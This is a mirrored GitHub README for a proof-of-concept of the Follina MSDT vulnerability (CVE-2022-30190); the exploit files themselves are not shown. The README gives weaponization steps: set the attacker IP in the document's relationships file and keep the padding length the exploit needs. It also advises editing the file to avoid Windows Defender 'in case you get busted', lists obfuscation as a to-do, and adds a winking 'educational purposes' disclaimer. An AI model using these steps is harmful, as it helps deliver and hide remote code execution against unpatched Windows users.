Giters

drgreenthumb93 / CVE-2022-30190-follina

Just another PoC for the new MSDT-Exploit

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2022-30190-follina

Just another PoC for the new MSDT-Exploit

To edit the Doc, just open with 7z, xarchiver, ... to change the value in word\rels\document.xml.rels to your IP.

The exploit must contain at least 3541 characters before the window.location.href, and they must be within the script tag. Now there are about 9000, just to be sure.

More about the exploit:

https://www.borncity.com/blog/2022/06/01/follina-schwachstelle-cve-2022-30190-warnungen-erste-angriffe-der-status/ (german)
https://packetstormsecurity.com/files/167317/msdt-poc.txt

Mitigation and workaround:

https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

Windows Defender already knows that this is a security flaw (Trojan:Win32/Mesdetty.D), so you have to edit the file, in case you get busted.

REMEMBER: ONLY FOR EDUCATIONAL PURPOSES!!! ;)

To-Do:

  • Obfuscation
  • Invoke PS Script

About

Just another PoC for the new MSDT-Exploit

Languages

Language:HTML 100.0%